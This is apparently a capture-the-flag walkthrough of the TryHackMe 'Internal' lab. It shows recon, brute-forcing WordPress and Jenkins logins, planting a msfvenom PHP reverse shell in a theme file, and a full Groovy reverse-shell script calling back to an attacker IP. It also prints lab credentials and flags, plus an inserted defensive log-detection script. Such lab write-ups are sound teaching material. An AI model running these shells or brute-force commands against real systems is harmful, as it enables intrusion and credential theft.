Attacking IP: 10.17.34.202
Target IP: 10.10.109.1
Recon
Nmap:
nmap -A -T3 -oN nmap.txt 10.10.109.1
Output:
# Nmap 7.94SVN scan initiated Sat Dec 9 17:07:57 2023 as: nmap -A -T3 -oN nmap.txt 10.10.109.1
Nmap scan report for 10.10.109.1
Host is up (0.30s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
| 256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_ 256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 9 17:08:48 2023 -- 1 IP address (1 host up) scanned in 50.80 seconds
Gobuster:
gobuster dir -u http://10.10.109.1 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
Output:
/wordpress (Status: 301) [Size: 314] [--> http://10.10.109.1/wordpress/]
/blog (Status: 301) [Size: 309] [--> http://10.10.109.1/blog/]
/javascript (Status: 301) [Size: 315] [--> http://10.10.109.1/javascript/]
/phpmyadmin (Status: 301) [Size: 315] [--> http://10.10.109.1/phpmyadmin/]
The /blog site is a bit ugly and the assignment tells us that:
Quote
Ensure that you modify your hosts file to reflect internal.thm
So we add an entry to /etc/hosts to reflect internal.thm with the target IP:
10.10.109.1 internal.thm
The site is more beautiful (?🤔).
Scan with WPScan:
wpscan -u http://10.10.109.1/blog -e vp,u
With:
-u: specify the URL
-e: enumerate
vp: vulnerable plugins
u: user IDs range (default: 1-10)
Output:
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
[i] User(s) Identified:
[+] admin
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)
Brute Force
Try to brute force the password of admin by using ffuf [1]:
ffuf -w /usr/share/wordlists/rockyou.txt -X POST -d "username=admin&password=FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.109.1/blog/wp-login.php -mc 200
We can also use wpscan:
wpscan --url http://10.10.109.1/blog --usernames admin --passwords /usr/share/wordlists/rockyou.txt --max-threads 100
We get the password very quickly:
[!] Valid Combinations Found:
| Username: admin, Password: my2boys
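A defender-side check for the wp-login.php brute force shown above, added here as an example that is not part of the original write-up: it parses constructed Apache access-log lines (the source IP is the attacking IP from this room; the WPScan User-Agent string is an assumption) and flags any source that posts a burst of failed logins, noting whether a 302 (a successful login) followed the burst.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed Apache combined-log lines (not from the write-up). A failed
# wp-login.php POST re-renders the form with HTTP 200; a success is a 302.
SAMPLE_LOG = """\
10.17.34.202 - - [09/Dec/2023:17:20:01 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4215 "-" "WPScan v3.8.22"
10.17.34.202 - - [09/Dec/2023:17:20:01 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4215 "-" "WPScan v3.8.22"
10.17.34.202 - - [09/Dec/2023:17:20:02 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4215 "-" "WPScan v3.8.22"
10.17.34.202 - - [09/Dec/2023:17:20:02 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4215 "-" "WPScan v3.8.22"
10.17.34.202 - - [09/Dec/2023:17:20:03 +0000] "POST /blog/wp-login.php HTTP/1.1" 200 4215 "-" "WPScan v3.8.22"
10.17.34.202 - - [09/Dec/2023:17:20:03 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8.22"
10.10.14.7 - - [09/Dec/2023:17:25:10 +0000] "POST /blog/wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')

def wp_login_posts(log_text):
    """Yield (ip, timestamp, status) for every POST to wp-login.php."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m and m["method"] == "POST" and m["path"].split("?")[0].endswith("/wp-login.php"):
            yield m["ip"], datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"), int(m["status"])

def detect_wp_login_bruteforce(log_text, threshold=5, window=timedelta(minutes=1)):
    """Flag IPs with >= threshold failed (200) wp-login.php POSTs inside one
    window, and note whether a 302 (successful login) followed the burst."""
    by_ip = defaultdict(list)
    for ip, ts, status in wp_login_posts(log_text):
        by_ip[ip].append((ts, status))
    findings = {}
    for ip, hits in by_ip.items():
        hits.sort()
        failed = [ts for ts, st in hits if st == 200]
        for i in range(len(failed)):            # sliding window over failures
            j = i
            while j < len(failed) and failed[j] - failed[i] <= window:
                j += 1
            if j - i >= threshold:
                after = any(st == 302 and ts >= failed[j - 1] for ts, st in hits)
                findings[ip] = {"failed": len(failed), "success_after_burst": after}
                break
    return findings

if __name__ == "__main__":
    print(detect_wp_login_bruteforce(SAMPLE_LOG))
```

The single 302 from 10.10.14.7 is not flagged, since a lone successful login with no preceding failure burst is normal admin traffic.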
After login, we get the “Administration email verification” message, which reveals the email: admin@internal.thm
In the blog posts section, we see a private post (/blog/wp-admin/post.php?post=5) that has this content:
Quote
Don’t forget to reset Will’s credentials. william:arnold147
Seems like a credential 🤦♀️. But it is a rabbit hole 😱 (according to the room’s author).
Reverse Shell
On WordPress, we can use the “Theme Editor” feature and edit the first theme (“Twenty Seventeen”) to create a reverse shell [2].
Generate the script to create the reverse shell by using msfvenom (Metasploit):
msfvenom -p php/meterpreter_reverse_tcp LHOST=tun0 LPORT=9999 -f raw > rev_shell.php
Edit the 404 template (the 404.php file) and replace its content with the above script content.
Start a meterpreter session:
msfconsole -x 'use php/meterpreter_reverse_tcp;set lhost tun0;set lport 9999;exploit'
Access this URL and we will get the reverse shell:
http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php
Notice the theme name is twentyseventeen. This name can be found by clicking on the “Customize” button of the theme.
Aubreanna
After receiving the reverse shell, try to move to the folder /home/aubreanna, but it fails. This happens because the current user is www-data (use the getuid command of meterpreter) and this user does not have access.
Search for text file with meterpreter:
search -f *.txt
Find some interesting files:
/boot/grub/gfxblacklist.txt
/opt/wp-save.txt
Content of wp-save.txt:
Bill,
Aubreanna needed these credentials for something later. Let her know you have them and where they are.
aubreanna:bubb13guM!@#123
Use this to log in as user aubreanna through SSH:
ssh aubreanna@internal.thm
After logging in, read user.txt and we have the flag:
Success
THM{int3rna1_fl4g_1}
Jenkins
Also find a file named jenkins.txt that reveals the Jenkins endpoint: http://172.17.0.2:8080/. This IP address, according to the room’s author, is a common address of a Docker container.
Use SSH tunneling [3] to connect to the Jenkins service:
ssh -L 8080:172.17.0.2:8080 aubreanna@internal.thm
Now, the address 172.17.0.2:8080 will be forwarded to localhost:8080. Open a browser and we get the login page of Jenkins.
Use Burp Suite Intruder (can’t use ffuf because we want to examine the response headers) to brute force the password with the first 500 passwords from the rockyou.txt wordlist.
Find a response that contains this header:
Set-Cookie: JSESSIONID.bb2720fc=node019otbsjxrec5d1ko5l17b7tedl22478.node0
This response’s size is the smallest, so maybe its payload (spongebob) is the password. Try this password and it works.
Use the “Script Console” feature in the “Manage Jenkins” section to create a reverse shell in Groovy. The script to create the reverse shell:
// Groovy: connect back to host:port and pump the shell's stdout/stderr to the socket and the socket to its stdin
String host="10.17.34.202";
int port=9999;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
  while(pi.available()>0)so.write(pi.read());
  while(pe.available()>0)so.write(pe.read());
  while(si.available()>0)po.write(si.read());
  so.flush();po.flush();
  Thread.sleep(50);
  try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();
Execute the script and we will receive a reverse shell (remember to start an nc listener before).
Go to the /opt folder again and find a file named note.txt with this content:
Aubreanna,
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account.
root:tr0ub13guM!@#123
And we found the root password 🤷♀️.
Log in, read root.txt and we have the flag:
Success
THM{d0ck3r_d3str0y3r}
Resources
- Room: https://tryhackme.com/room/internal
- Walkthrough: https://www.youtube.com/watch?v=2TmguIvR3Kw
Footnotes
1. refer to TryHackMe - Authentication Bypass
2. refer to Introduction to Shells